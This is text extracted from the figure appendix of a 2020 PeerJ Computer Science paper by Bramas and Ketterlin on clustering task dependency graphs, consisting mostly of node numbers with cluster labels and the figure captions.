[1/19] 77 [1/26] 78 [1/26] 79 [1/26] 83 [1/11] 84 [1/11] 85 [1/15] 86 [1/15] 87 [1/15] 88 [1/20] 89 [1/20] 90 [1/20] 91 [1/27] 92 [1/27] 93 [1/27] 94 [1/32] 95 [1/32] 99 [1/11] 100 [1/11] 101 [1/15] 102 [1/15] 103 [1/15] 104 [1/20] 105 [1/20] 106 [1/20] 107 [1/27] 108 [1/27] 109 [1/27] 110 [1/32] 111 [1/32] 115 [1/13] 116 [1/13] 117 [1/18] 118 [1/18] 119 [1/18] 120 [1/24] 121 [1/24] 122 [1/24] 123 [1/30] 124 [1/30] 125 [1/33] 126 [1/33] 127 [1/33] 131 [1/13] 132 [1/13] 133 [1/18] 134 [1/18] 135 [1/18] 136 [1/24] 137 [1/24] 138 [1/24] 139 [1/30] 140 [1/33] 141 [1/33] 142 [1/33] 143 [1/38] 147 [1/17] 148 [1/17] 149 [1/23] 150 [1/23] 151 [1/23] 152 [1/29] 153 [1/29] 154 [1/29] 155 [1/34] 156 [1/34] 157 [1/34] 158 [1/38] 159 [1/38] 163 [1/17] 164 [1/17] 165 [1/23] 166 [1/23] 167 [1/23] 168 [1/29] 169 [1/29] 170 [1/29] 171 [1/34] 172 [1/34] 173 [1/34] 174 [1/38] 175 [1/38] 179 [1/21] 180 [1/21] 181 [1/28] 182 [1/28] 183 [1/28] 184 [1/32] 185 [1/32] 186 [1/36] 187 [1/37] 188 [1/37] 189 [1/37] 190 [1/38] 191 [1/41] 195 [1/21] 196 [1/21] 197 [1/28] 198 [1/28] 199 [1/28] 200 [1/35] 201 [1/35] 202 [1/37] 203 [1/37] 204 [1/37] 205 [1/40] 206 [1/40] 207 [1/42] 211 [1/25] 212 [1/25] 213 [1/31] 214 [1/31] 215 [1/31] 216 [1/35] 217 [1/35] 218 [1/39] 219 [1/39] 220 [1/39] 221 [1/40] 222 [1/40] 223 [1/42] 227 [1/25] 228 [1/25] 229 [1/31] 230 [1/31] 231 [1/31] 232 [1/35] 233 [1/35] 234 [1/39] 235 [1/39] 236 [1/39] 237 [1/40] 238 [1/40] 239 [1/42] 243 [1/30] 244 [1/30] 245 [1/36] 246 [1/36] 247 [1/36] 248 [1/36] 249 [1/36] 250 [1/41] 251 [1/41] 252 [1/41] 253 [1/41] 254 [1/41] 255 [1/42] 0 [1/0] Figure A1 Clustering of a graph of 256 nodes generated by propagation of the dependencies on a 2D grid from one corner to the opposite one. The cluster size is M =6. There are 43 clusters. Full-size DOI: 10.7717/peerjcs.247/fig-7 Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 20/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-7 http://dx.doi.org/10.7717/peerj-cs.247 1200 [1/0] 980 [1/27] 981 [1/19] 982 [1/19] 983 [1/19] 984 [1/19] 985 [1/0] 986 [1/0] 987 [1/0] 988 [1/0] 989 [1/0] 990 [1/0] 991 [1/0] 992 [1/0] 993 [1/0] 994 [1/0] 995 [1/0] 996 [1/0] 997 [1/0] 998 [1/0] 999 [1/0] 1180 [1/1] 1181 [1/1] 1182 [1/1] 1183 [1/1] 1184 [1/4] 1185 [1/4] 1186 [1/4] 1187 [1/4] 1188 [1/8] 1189 [1/8] 1190 [1/8] 1191 [1/8] 1192 [1/14] 1193 [1/14] 1194 [1/14] 1195 [1/14] 1196 [1/21] 1197 [1/21] 1198 [1/21] 1199 [1/21] 960 [1/27] 799 [1/53] 961 [1/19] 962 [1/19] 963 [1/19] 964 [1/19] 965 [1/18] 966 [1/18] 967 [1/18] 968 [1/11] 969 [1/11] 970 [1/11] 971 [1/11] 972 [1/6] 973 [1/6] 974 [1/6] 975 [1/6] 976 [1/2] 977 [1/2] 978 [1/2] 979 [1/2] 1160 [1/1] 1161 [1/1] 1162 [1/1] 1163 [1/1] 1164 [1/4] 1165 [1/4] 1166 [1/4] 1167 [1/4] 1168 [1/8] 1169 [1/8] 1170 [1/8] 1171 [1/8] 1172 [1/14] 1173 [1/14] 1174 [1/14] 1175 [1/14] 1176 [1/21] 1177 [1/21] 1178 [1/21] 580 [1/56] 1179 [1/21] 1140 [1/1] 1141 [1/1] 1142 [1/1] 1143 [1/1] 1144 [1/4] 1145 [1/4] 1146 [1/4] 1147 [1/4] 1148 [1/8] 1149 [1/8] 1150 [1/8] 1151 [1/8] 1152 [1/14] 1153 [1/14] 1154 [1/14] 1155 [1/14] 1156 [1/21] 1157 [1/21] 1158 [1/21] 1201 [1/75] 581 [1/56] 560 [1/56] 1159 [1/21] 1120 [1/1] 1121 [1/1] 1122 [1/1] 1123 [1/1] 1124 [1/4] 1125 [1/4] 1126 [1/4] 1127 [1/4] 1128 [1/8] 1129 [1/8] 1130 [1/8] 1131 [1/8] 1132 [1/14] 1133 [1/14] 1134 [1/14] 1135 [1/14] 1136 [1/21] 1137 [1/21] 1138 [1/21] 561 [1/56] 540 [1/56] 1139 [1/21] 1100 [1/3] 1101 [1/3] 1102 [1/3] 1103 [1/3] 1104 [1/7] 1105 [1/7] 1106 [1/7] 1107 [1/12] 1108 [1/12] 1109 [1/12] 1110 [1/12] 1111 [1/12] 1112 [1/20] 1113 [1/20] 1114 [1/25] 1115 [1/25] 1116 [1/25] 1117 [1/25] 1118 [1/25] 541 [1/56] 520 [1/48] 1119 [1/25] 1080 [1/3] 1081 [1/3] 1082 [1/3] 1083 [1/3] 1084 [1/7] 1085 [1/7] 1086 [1/7] 1087 [1/12] 1088 [1/12] 1089 [1/12] 1090 [1/12] 1091 [1/12] 1092 [1/20] 1093 [1/20] 1094 [1/25] 1095 [1/25] 1096 [1/25] 1097 [1/25] 1098 [1/25] 521 [1/48] 500 [1/48] 1099 [1/25] 1060 [1/3] 1061 [1/3] 1062 [1/3] 1063 [1/3] 1064 [1/7] 1065 [1/7] 1066 [1/13] 1067 [1/13] 1068 [1/13] 1069 [1/13] 1070 [1/20] 1071 [1/20] 1072 [1/20] 1073 [1/27] 1074 [1/27] 1075 [1/27] 1076 [1/32] 1077 [1/32] 1078 [1/32] 501 [1/48] 480 [1/48] 1079 [1/32] 1040 [1/3] 1041 [1/3] 1042 [1/3] 1043 [1/3] 1044 [1/12] 1045 [1/12] 1046 [1/13] 1047 [1/13] 1048 [1/13] 1049 [1/13] 1050 [1/20] 1051 [1/20] 1052 [1/20] 1053 [1/27] 1054 [1/27] 1055 [1/27] 1056 [1/32] 1057 [1/32] 1058 [1/32] 481 [1/48] 460 [1/48] 1059 [1/32] 1020 [1/7] 1021 [1/7] 1022 [1/7] 1023 [1/7] 1024 [1/12] 1025 [1/12] 1026 [1/13] 1027 [1/13] 1028 [1/13] 1029 [1/13] 1030 [1/20] 1031 [1/20] 1032 [1/20] 1033 [1/27] 1034 [1/27] 1035 [1/27] 1036 [1/32] 1037 [1/32] 1038 [1/32] 461 [1/48] 440 [1/42] 1039 [1/32] 1000 [1/7] 1001 [1/7] 1002 [1/7] 1003 [1/7] 1004 [1/12] 1005 [1/12] 1006 [1/13] 1007 [1/13] 1008 [1/13] 1009 [1/13] 1010 [1/20] 1011 [1/20] 1012 [1/20] 1013 [1/27] 1014 [1/27] 1015 [1/27] 1016 [1/32] 1017 [1/32] 1018 [1/32] 441 [1/42] 420 [1/42] 1019 [1/32] 0 [1/9] 20 [1/9] 40 [1/9] 60 [1/15] 80 [1/15] 100 [1/15] 120 [1/15] 140 [1/23] 160 [1/23] 180 [1/23] 200 [1/23] 220 [1/31] 240 [1/31] 260 [1/31] 280 [1/31] 300 [1/37] 320 [1/37] 340 [1/37] 360 [1/37] 421 [1/42] 400 [1/42] 380 [1/42] 1 [1/9] 21 [1/9] 41 [1/9] 61 [1/15] 81 [1/15] 101 [1/15] 121 [1/15] 141 [1/23] 161 [1/23] 181 [1/23] 201 [1/23] 221 [1/31] 241 [1/31] 261 [1/31] 281 [1/31] 301 [1/37] 321 [1/37] 341 [1/37] 361 [1/37] 401 [1/42] 381 [1/42] 959 [1/2] 958 [1/2] 939 [1/2] 938 [1/2]957 [1/2] 919 [1/2] 918 [1/2]937 [1/2] 899 [1/5] 898 [1/5]917 [1/2] 879 [1/5] 878 [1/5]897 [1/5] 859 [1/5] 858 [1/5]877 [1/5] 839 [1/5] 838 [1/5]857 [1/5] 819 [1/9] 818 [1/9]837 [1/5] 817 [1/9] 2 [1/9] 22 [1/9] 42 [1/9] 62 [1/15] 82 [1/15] 102 [1/15] 122 [1/15] 142 [1/23] 162 [1/23] 182 [1/23] 202 [1/23] 222 [1/31] 242 [1/31] 262 [1/31] 282 [1/31] 302 [1/37] 322 [1/37] 342 [1/37] 362 [1/37] 382 [1/42] 402 [1/42] 422 [1/42] 442 [1/42] 462 [1/48] 482 [1/48] 502 [1/48] 522 [1/48] 542 [1/56] 562 [1/56] 582 [1/56] 956 [1/2] 936 [1/2] 916 [1/2] 896 [1/5] 876 [1/5] 856 [1/5] 836 [1/5] 816 [1/9] 3 [1/9] 23 [1/9] 43 [1/9] 63 [1/15] 83 [1/15] 103 [1/15] 123 [1/15] 143 [1/23] 163 [1/23] 183 [1/23] 203 [1/23] 223 [1/31] 243 [1/31] 263 [1/31] 283 [1/31] 303 [1/37] 323 [1/37] 343 [1/37] 363 [1/37] 383 [1/42] 403 [1/42] 423 [1/42] 443 [1/42] 463 [1/48] 483 [1/48] 503 [1/48] 523 [1/48] 543 [1/56] 563 [1/56] 583 [1/56] 955 [1/6] 935 [1/6] 915 [1/6] 895 [1/10] 875 [1/10] 855 [1/10] 835 [1/10] 815 [1/16] 4 [1/16] 24 [1/16] 44 [1/16] 64 [1/22] 84 [1/22] 104 [1/22] 124 [1/22] 144 [1/30] 164 [1/30] 184 [1/30] 204 [1/30] 224 [1/36] 244 [1/36] 264 [1/36] 284 [1/36] 304 [1/41] 324 [1/41] 344 [1/41] 364 [1/41] 384 [1/47] 404 [1/47] 424 [1/47] 444 [1/47] 464 [1/55] 484 [1/55] 504 [1/55] 524 [1/55] 544 [1/56] 564 [1/56] 584 [1/56] 954 [1/6] 934 [1/6] 914 [1/6] 894 [1/10] 874 [1/10] 854 [1/10] 834 [1/10] 814 [1/16] 5 [1/16] 25 [1/16] 45 [1/16] 65 [1/22] 85 [1/22] 105 [1/22] 125 [1/22] 145 [1/30] 165 [1/30] 185 [1/30] 205 [1/30] 225 [1/36] 245 [1/36] 265 [1/36] 285 [1/36] 305 [1/41] 325 [1/41] 345 [1/41] 365 [1/41] 385 [1/47] 405 [1/47] 425 [1/47] 445 [1/47] 465 [1/55] 485 [1/55] 505 [1/55] 525 [1/55] 545 [1/56] 565 [1/64] 585 [1/64] 953 [1/6] 933 [1/6] 913 [1/6] 893 [1/10] 873 [1/10] 853 [1/10] 833 [1/10] 813 [1/16] 6 [1/16] 26 [1/16] 46 [1/16] 66 [1/22] 86 [1/22] 106 [1/22] 126 [1/22] 146 [1/30] 166 [1/30] 186 [1/30] 206 [1/30] 226 [1/36] 246 [1/36] 266 [1/36] 286 [1/36] 306 [1/41] 326 [1/41] 346 [1/41] 366 [1/41] 386 [1/47] 406 [1/47] 426 [1/47] 446 [1/47] 466 [1/55] 486 [1/55] 506 [1/55] 526 [1/55] 546 [1/64] 566 [1/64] 586 [1/64] 952 [1/6] 932 [1/6] 912 [1/6] 892 [1/10] 872 [1/10] 852 [1/10] 832 [1/10] 812 [1/16] 7 [1/16] 27 [1/16] 47 [1/16] 67 [1/22] 87 [1/22] 107 [1/22] 127 [1/22] 147 [1/30] 167 [1/30] 187 [1/30] 207 [1/30] 227 [1/36] 247 [1/36] 267 [1/36] 287 [1/36] 307 [1/41] 327 [1/41] 347 [1/41] 367 [1/41] 387 [1/47] 407 [1/47] 427 [1/47] 447 [1/47] 467 [1/55] 487 [1/55] 507 [1/55] 527 [1/55] 547 [1/64] 567 [1/64] 587 [1/64] 951 [1/11] 931 [1/11] 911 [1/11] 891 [1/17] 871 [1/17] 851 [1/17] 831 [1/17] 811 [1/24] 8 [1/24] 28 [1/24] 48 [1/24] 68 [1/29] 88 [1/29] 108 [1/29] 128 [1/29] 148 [1/35] 168 [1/35] 188 [1/35] 208 [1/35] 228 [1/40] 248 [1/40] 268 [1/40] 288 [1/40] 308 [1/46] 328 [1/46] 348 [1/46] 368 [1/46] 388 [1/54] 408 [1/54] 428 [1/54] 448 [1/54] 468 [1/62] 488 [1/62] 508 [1/62] 528 [1/62] 548 [1/64] 568 [1/64] 588 [1/69] 950 [1/11] 930 [1/11] 910 [1/11] 890 [1/17] 870 [1/17] 850 [1/17] 830 [1/17] 810 [1/24] 9 [1/24] 29 [1/24] 49 [1/24] 69 [1/29] 89 [1/29] 109 [1/29] 129 [1/29] 149 [1/35] 169 [1/35] 189 [1/35] 209 [1/35] 229 [1/40] 249 [1/40] 269 [1/40] 289 [1/40] 309 [1/46] 329 [1/46] 349 [1/46] 369 [1/46] 389 [1/54] 409 [1/54] 429 [1/54] 449 [1/54] 469 [1/62] 489 [1/62] 509 [1/62] 529 [1/62] 549 [1/64] 569 [1/64] 589 [1/69] 949 [1/11] 929 [1/11] 909 [1/11] 889 [1/17] 869 [1/17] 849 [1/17] 829 [1/17] 809 [1/24] 10 [1/24] 30 [1/24] 50 [1/24] 70 [1/29] 90 [1/29] 110 [1/29] 130 [1/29] 150 [1/35] 170 [1/35] 190 [1/35] 210 [1/35] 230 [1/40] 250 [1/40] 270 [1/40] 290 [1/40] 310 [1/46] 330 [1/46] 350 [1/46] 370 [1/46] 390 [1/54] 410 [1/54] 430 [1/54] 450 [1/54] 470 [1/62] 490 [1/62] 510 [1/62] 530 [1/62] 550 [1/64] 570 [1/64] 590 [1/69] 948 [1/11] 928 [1/11] 908 [1/11] 888 [1/17] 868 [1/17] 848 [1/17] 828 [1/17] 808 [1/24] 11 [1/24] 31 [1/24] 51 [1/24] 71 [1/29] 91 [1/29] 111 [1/29] 131 [1/29] 151 [1/35] 171 [1/35] 191 [1/35] 211 [1/35] 231 [1/40] 251 [1/40] 271 [1/40] 291 [1/40] 311 [1/46] 331 [1/46] 351 [1/46] 371 [1/46] 391 [1/54] 411 [1/54] 431 [1/54] 451 [1/54] 471 [1/62] 491 [1/62] 511 [1/62] 531 [1/62] 551 [1/64] 571 [1/64] 591 [1/69] 947 [1/18] 927 [1/18] 907 [1/18] 887 [1/18] 867 [1/18] 847 [1/25] 827 [1/25] 807 [1/25] 12 [1/25] 32 [1/33] 52 [1/33] 72 [1/33] 92 [1/33] 112 [1/33] 132 [1/33] 152 [1/39] 172 [1/43] 192 [1/43] 212 [1/43] 232 [1/43] 252 [1/50] 272 [1/50] 292 [1/50] 312 [1/50] 332 [1/57] 352 [1/57] 372 [1/57] 392 [1/57] 412 [1/63] 432 [1/63] 452 [1/63] 472 [1/63] 492 [1/68] 512 [1/68] 532 [1/68] 552 [1/68] 572 [1/72] 592 [1/72] 946 [1/18] 926 [1/18] 906 [1/18] 886 [1/18] 866 [1/26] 846 [1/26] 826 [1/26] 806 [1/26] 13 [1/26] 33 [1/33] 53 [1/33] 73 [1/33] 93 [1/33] 113 [1/33] 133 [1/39] 153 [1/39] 173 [1/43] 193 [1/43] 213 [1/43] 233 [1/43] 253 [1/50] 273 [1/50] 293 [1/50] 313 [1/50] 333 [1/57] 353 [1/57] 373 [1/57] 393 [1/57] 413 [1/63] 433 [1/63] 453 [1/63] 473 [1/63] 493 [1/68] 513 [1/68] 533 [1/68] 553 [1/68] 573 [1/72] 593 [1/72] 945 [1/18] 925 [1/18] 905 [1/18] 885 [1/18] 865 [1/26] 845 [1/26] 825 [1/26] 805 [1/26] 14 [1/26] 34 [1/33] 54 [1/33] 74 [1/33] 94 [1/33] 114 [1/33] 134 [1/39] 154 [1/39] 174 [1/43] 194 [1/43] 214 [1/43] 234 [1/43] 254 [1/50] 274 [1/50] 294 [1/50] 314 [1/50] 334 [1/57] 354 [1/57] 374 [1/57] 394 [1/57] 414 [1/63] 434 [1/63] 454 [1/63] 474 [1/63] 494 [1/68] 514 [1/68] 534 [1/68] 554 [1/68] 574 [1/72] 594 [1/72] 944 [1/19] 924 [1/19] 904 [1/26] 884 [1/26] 864 [1/26] 844 [1/26] 824 [1/26] 804 [1/26] 15 [1/34] 35 [1/34] 55 [1/38] 75 [1/38] 95 [1/39] 115 [1/39] 135 [1/39] 155 [1/39] 175 [1/43] 195 [1/43] 215 [1/43] 235 [1/43] 255 [1/50] 275 [1/50] 295 [1/50] 315 [1/50] 335 [1/57] 355 [1/57] 375 [1/57] 395 [1/57] 415 [1/63] 435 [1/63] 455 [1/63] 475 [1/63] 495 [1/68] 515 [1/68] 535 [1/68] 555 [1/68] 575 [1/72] 595 [1/72] 943 [1/19] 923 [1/19] 903 [1/28] 883 [1/28] 863 [1/28] 843 [1/28] 823 [1/34] 803 [1/34] 16 [1/34] 36 [1/38] 56 [1/38] 76 [1/38] 96 [1/39] 116 [1/39] 136 [1/39] 156 [1/39] 176 [1/49] 196 [1/49] 216 [1/51] 236 [1/51] 256 [1/51] 276 [1/51] 296 [1/58] 316 [1/58] 336 [1/58] 356 [1/58] 376 [1/65] 396 [1/65] 416 [1/65] 436 [1/65] 456 [1/69] 476 [1/69] 496 [1/69] 516 [1/72] 536 [1/72] 556 [1/72] 576 [1/74] 596 [1/74] 942 [1/19] 922 [1/19] 902 [1/28] 882 [1/28] 862 [1/28] 842 [1/28] 822 [1/34] 802 [1/34] 17 [1/34] 37 [1/38] 57 [1/38] 77 [1/38] 97 [1/39] 117 [1/39] 137 [1/39] 157 [1/49] 177 [1/49] 197 [1/49] 217 [1/51] 237 [1/51] 257 [1/51] 277 [1/51] 297 [1/58] 317 [1/58] 337 [1/58] 357 [1/58] 377 [1/65] 397 [1/65] 417 [1/65] 437 [1/65] 457 [1/69] 477 [1/69] 497 [1/69] 517 [1/72] 537 [1/72] 557 [1/72] 577 [1/74] 597 [1/74] 941 [1/19] 921 [1/19] 901 [1/28] 881 [1/28] 861 [1/28] 841 [1/28] 821 [1/34] 801 [1/34] 18 [1/34] 38 [1/38] 58 [1/38] 78 [1/44] 98 [1/44] 118 [1/44] 138 [1/44] 158 [1/49] 178 [1/49] 198 [1/49] 218 [1/51] 238 [1/51] 258 [1/51] 278 [1/51] 298 [1/58] 318 [1/58] 338 [1/58] 358 [1/58] 378 [1/65] 398 [1/65] 418 [1/65] 438 [1/65] 458 [1/69] 478 [1/69] 498 [1/69] 518 [1/72] 538 [1/72] 558 [1/74] 578 [1/74] 598 [1/74] 940 [1/27] 920 [1/27] 900 [1/28] 880 [1/28] 860 [1/28] 840 [1/28] 820 [1/34] 800 [1/34] 19 [1/34] 39 [1/38] 59 [1/38] 79 [1/44] 99 [1/44] 119 [1/44] 139 [1/44] 159 [1/49] 179 [1/49] 199 [1/49] 219 [1/51] 239 [1/51] 259 [1/51] 279 [1/51] 299 [1/58] 319 [1/58] 339 [1/58] 359 [1/58] 379 [1/65] 399 [1/65] 419 [1/65] 439 [1/65] 459 [1/69] 479 [1/69] 499 [1/69] 519 [1/74] 539 [1/74] 559 [1/74] 579 [1/74] 599 [1/75] 779 [1/53] 759 [1/53] 739 [1/53] 719 [1/45] 699 [1/45] 679 [1/45] 659 [1/45] 639 [1/34] 619 [1/34] 618 [1/38] 617 [1/38] 616 [1/44] 615 [1/44] 614 [1/44] 613 [1/44] 612 [1/49] 611 [1/49] 610 [1/49] 609 [1/59] 608 [1/59] 607 [1/59] 606 [1/59] 605 [1/59] 604 [1/59] 603 [1/59] 602 [1/59] 601 [1/70] 600 [1/70] 798 [1/53] 778 [1/53] 758 [1/53] 738 [1/53] 718 [1/45] 698 [1/45] 678 [1/45] 658 [1/45] 638 [1/38] 637 [1/38] 657 [1/45] 677 [1/45] 697 [1/45] 717 [1/45] 737 [1/53] 757 [1/53] 777 [1/53] 797 [1/53] 636 [1/44] 656 [1/45] 676 [1/45] 696 [1/45] 716 [1/45] 736 [1/53] 756 [1/53] 776 [1/53] 796 [1/53] 635 [1/44] 655 [1/52] 675 [1/52] 695 [1/52] 715 [1/52] 735 [1/61] 755 [1/61] 775 [1/61] 795 [1/61] 634 [1/44] 654 [1/52] 674 [1/52] 694 [1/52] 714 [1/52] 734 [1/61] 754 [1/61] 774 [1/61] 794 [1/61] 633 [1/44] 653 [1/52] 673 [1/52] 693 [1/52] 713 [1/52] 733 [1/61] 753 [1/61] 773 [1/61] 793 [1/61] 632 [1/49] 652 [1/52] 672 [1/52] 692 [1/52] 712 [1/52] 732 [1/61] 752 [1/61] 772 [1/61] 792 [1/61] 631 [1/49] 651 [1/60] 671 [1/60] 691 [1/60] 711 [1/60] 731 [1/67] 751 [1/67] 771 [1/67] 791 [1/67] 630 [1/59] 650 [1/60] 670 [1/60] 690 [1/60] 710 [1/60] 730 [1/67] 750 [1/67] 770 [1/67] 790 [1/67] 629 [1/59] 649 [1/60] 669 [1/60] 689 [1/60] 709 [1/60] 729 [1/67] 749 [1/67] 769 [1/67] 789 [1/67] 628 [1/59] 648 [1/60] 668 [1/60] 688 [1/60] 708 [1/60] 728 [1/67] 748 [1/67] 768 [1/67] 788 [1/67] 627 [1/59] 647 [1/66] 667 [1/66] 687 [1/66] 707 [1/66] 727 [1/71] 747 [1/71] 767 [1/71] 787 [1/71] 626 [1/59] 646 [1/66] 666 [1/66] 686 [1/66] 706 [1/66] 726 [1/71] 746 [1/71] 766 [1/71] 786 [1/71] 625 [1/59] 645 [1/66] 665 [1/66] 685 [1/66] 705 [1/66] 725 [1/71] 745 [1/71] 765 [1/71] 785 [1/71] 624 [1/59] 644 [1/66] 664 [1/66] 684 [1/66] 704 [1/66] 724 [1/71] 744 [1/71] 764 [1/71] 784 [1/71] 623 [1/59] 643 [1/70] 663 [1/70] 683 [1/70] 703 [1/73] 723 [1/73] 743 [1/73] 763 [1/73] 783 [1/73] 622 [1/70] 642 [1/70] 662 [1/70] 682 [1/70] 702 [1/73] 722 [1/73] 742 [1/73] 762 [1/73] 782 [1/73] 621 [1/70] 641 [1/70] 661 [1/70] 681 [1/70] 701 [1/73] 721 [1/73] 741 [1/73] 761 [1/73] 781 [1/73] 620 [1/70] 640 [1/70] 660 [1/70] 680 [1/73] 700 [1/74] 720 [1/74] 740 [1/74] 760 [1/74] 780 [1/74] Figure A2 Clustering of a graph of 1202 nodes generated by the transport equation on a disk. The clus- ter size is M =16. There are 76 clusters. Full-size DOI: 10.7717/peerjcs.247/fig-8 Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 21/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-8 http://dx.doi.org/10.7717/peerj-cs.247 63 [1/30] 127 [1/30] 126 [1/30] 119 [1/30] 183 [1/44]190 [1/60]191 [1/61] 182 [1/44] 189 [1/60] 175 [1/56] 62 [1/29] 125 [1/46]118 [1/44] 181 [1/46] 188 [1/46] 174 [1/44] 61 [1/29] 124 [1/29]117 [1/29] 180 [1/43] 187 [1/45]173 [1/41] 60 [1/28] 123 [1/45]116 [1/43] 179 [1/45] 186 [1/45]172 [1/43] 59 [1/28] 122 [1/28]115 [1/28] 178 [1/58] 185 [1/59]171 [1/55] 58 [1/27] 121 [1/27]114 [1/27] 177 [1/57] 184 [1/27] 170 [1/40] 57 [1/26] 120 [1/26]113 [1/42] 176 [1/42] 169 [1/42] 56 [1/26] 112 [1/26] 168 [1/39] 55 [1/25] 111 [1/41] 167 [1/55] 255 [1/61] 247 [1/61] 246 [1/74] 239 [1/56]254 [1/61] 253 [1/78] 54 [1/25] 110 [1/25] 166 [1/25] 245 [1/60] 238 [1/56]252 [1/60] 53 [1/24] 109 [1/41] 165 [1/41] 244 [1/46] 237 [1/73] 251 [1/77] 52 [1/24] 108 [1/24] 164 [1/24] 243 [1/58] 236 [1/72] 250 [1/76] 51 [1/23] 107 [1/40] 163 [1/40] 242 [1/58] 235 [1/71] 249 [1/75] 50 [1/23] 106 [1/23] 162 [1/23] 241 [1/59] 234 [1/58]248 [1/59] 49 [1/22] 105 [1/39] 161 [1/39] 240 [1/57] 233 [1/57] 48 [1/22] 104 [1/22] 160 [1/22] 232 [1/42] 47 [1/21] 103 [1/21] 159 [1/54] 231 [1/56] 311 [1/74]318 [1/90]319 [1/91] 310 [1/74] 317 [1/90] 303 [1/89] 46 [1/21] 102 [1/21] 158 [1/38] 230 [1/55] 309 [1/78] 316 [1/78] 302 [1/74] 45 [1/20] 101 [1/20] 157 [1/53] 229 [1/71] 308 [1/72] 315 [1/77]301 [1/73] 44 [1/20] 100 [1/20] 156 [1/37] 228 [1/43] 307 [1/77] 314 [1/77]300 [1/73] 43 [1/19] 99 [1/19] 155 [1/52] 227 [1/70] 306 [1/76] 313 [1/76]299 [1/72] 42 [1/19] 98 [1/19] 154 [1/36] 226 [1/40] 305 [1/75] 312 [1/75] 298 [1/88] 41 [1/18] 97 [1/18] 153 [1/51] 225 [1/69] 304 [1/59] 297 [1/87] 40 [1/18] 96 [1/18] 152 [1/35] 224 [1/39] 296 [1/57] 39 [1/17] 95 [1/38] 151 [1/38] 223 [1/55] 295 [1/87] 383 [1/91] 375 [1/91] 374 [1/106] 367 [1/89]382 [1/91] 381 [1/109] 38 [1/17] 94 [1/17] 150 [1/17] 222 [1/54] 294 [1/71] 373 [1/90] 366 [1/89]380 [1/90] 37 [1/16] 93 [1/37] 149 [1/37] 221 [1/68] 293 [1/73] 372 [1/78] 365 [1/103] 379 [1/108] 36 [1/16] 92 [1/16] 148 [1/16] 220 [1/53] 292 [1/72] 371 [1/105] 364 [1/102] 378 [1/107] 35 [1/15] 91 [1/36] 147 [1/36] 219 [1/67] 291 [1/86] 370 [1/104] 363 [1/102] 377 [1/107] 34 [1/15] 90 [1/15] 146 [1/15] 218 [1/52] 290 [1/70] 369 [1/104] 362 [1/88]376 [1/76] 33 [1/14] 89 [1/35] 145 [1/35] 217 [1/66] 289 [1/85] 368 [1/75] 361 [1/88] 32 [1/14] 88 [1/14] 144 [1/14] 216 [1/51] 288 [1/69] 360 [1/101] 31 [1/13] 87 [1/13] 143 [1/50] 215 [1/54] 287 [1/84] 359 [1/89] 439 [1/106]446 [1/125]447 [1/126] 438 [1/106] 445 [1/124] 431 [1/121] 30 [1/13] 86 [1/13] 142 [1/34] 214 [1/38] 286 [1/83] 358 [1/87] 437 [1/109] 444 [1/109] 430 [1/106] 29 [1/12] 85 [1/12] 141 [1/49] 213 [1/53] 285 [1/71] 357 [1/101] 436 [1/105] 443 [1/108]429 [1/120] 28 [1/12] 84 [1/12] 140 [1/33] 212 [1/37] 284 [1/68] 356 [1/86] 435 [1/108] 442 [1/108]428 [1/103] 27 [1/11] 83 [1/11] 139 [1/48] 211 [1/52] 283 [1/70] 355 [1/86] 434 [1/122] 441 [1/123]427 [1/105] 26 [1/11] 82 [1/11] 138 [1/32] 210 [1/36] 282 [1/67] 354 [1/88] 433 [1/107] 440 [1/107] 426 [1/119] 25 [1/10] 81 [1/10] 137 [1/47] 209 [1/51] 281 [1/69] 353 [1/100] 432 [1/104] 425 [1/104] 24 [1/10] 80 [1/10] 136 [1/31] 208 [1/35] 280 [1/66] 352 [1/85] 424 [1/118] 23 [1/9] 79 [1/34] 135 [1/34] 207 [1/65] 279 [1/83] 351 [1/87] 423 [1/117] 511 [1/137] 503 [1/126] 502 [1/125] 495 [1/121]510 [1/126] 509 [1/125] 22 [1/9] 78 [1/9] 134 [1/9] 206 [1/50] 278 [1/54] 350 [1/84] 422 [1/101] 501 [1/124] 494 [1/121]508 [1/124] 21 [1/8] 77 [1/33] 133 [1/33] 205 [1/64] 277 [1/68] 349 [1/99] 421 [1/103] 500 [1/109] 493 [1/120] 507 [1/136] 20 [1/8] 76 [1/8] 132 [1/8] 204 [1/49] 276 [1/53] 348 [1/98] 420 [1/102] 499 [1/122] 492 [1/120] 506 [1/136] 19 [1/7] 75 [1/32] 131 [1/32] 203 [1/63] 275 [1/67] 347 [1/86] 419 [1/102] 498 [1/122] 491 [1/134] 505 [1/123] 18 [1/7] 74 [1/7] 130 [1/7] 202 [1/48] 274 [1/52] 346 [1/70] 418 [1/100] 497 [1/123] 490 [1/122]504 [1/123] 17 [1/6] 73 [1/31] 129 [1/31] 201 [1/62] 273 [1/66] 345 [1/85] 417 [1/100] 496 [1/135] 489 [1/119] 16 [1/6] 72 [1/6] 128 [1/6] 200 [1/47] 272 [1/51] 344 [1/69] 416 [1/117] 488 [1/118] 15 [1/5] 71 [1/5] 199 [1/50] 271 [1/82] 343 [1/84] 415 [1/116] 487 [1/121] 567 [1/137]574 [1/137]575 [1/137] 566 [1/126] 573 [1/155] 559 [1/152] 14 [1/5] 70 [1/5] 198 [1/34] 270 [1/65] 342 [1/97] 414 [1/99] 486 [1/133] 565 [1/125] 572 [1/155] 558 [1/151] 13 [1/4] 69 [1/4] 197 [1/49] 269 [1/81] 341 [1/97] 413 [1/101] 485 [1/120] 564 [1/124] 571 [1/154]557 [1/150] 12 [1/4] 68 [1/4] 196 [1/33] 268 [1/64] 340 [1/68] 412 [1/99] 484 [1/103] 563 [1/153] 570 [1/154]556 [1/150] 11 [1/3] 67 [1/3] 195 [1/48] 267 [1/80] 339 [1/96] 411 [1/98] 483 [1/105] 562 [1/136] 569 [1/136]555 [1/134] 10 [1/3] 66 [1/3] 194 [1/32] 266 [1/63] 338 [1/67] 410 [1/115] 482 [1/119] 561 [1/135] 568 [1/153] 554 [1/134] 9 [1/2] 65 [1/2] 193 [1/47] 265 [1/79] 337 [1/95] 409 [1/100] 481 [1/117] 560 [1/135] 553 [1/149] 8 [1/2] 64 [1/2] 192 [1/31] 264 [1/62] 336 [1/66] 408 [1/85] 480 [1/118] 552 [1/135] 7 [1/1] 263 [1/65] 335 [1/83] 407 [1/114] 479 [1/133] 551 [1/149] 639 [1/170] 631 [1/166] 630 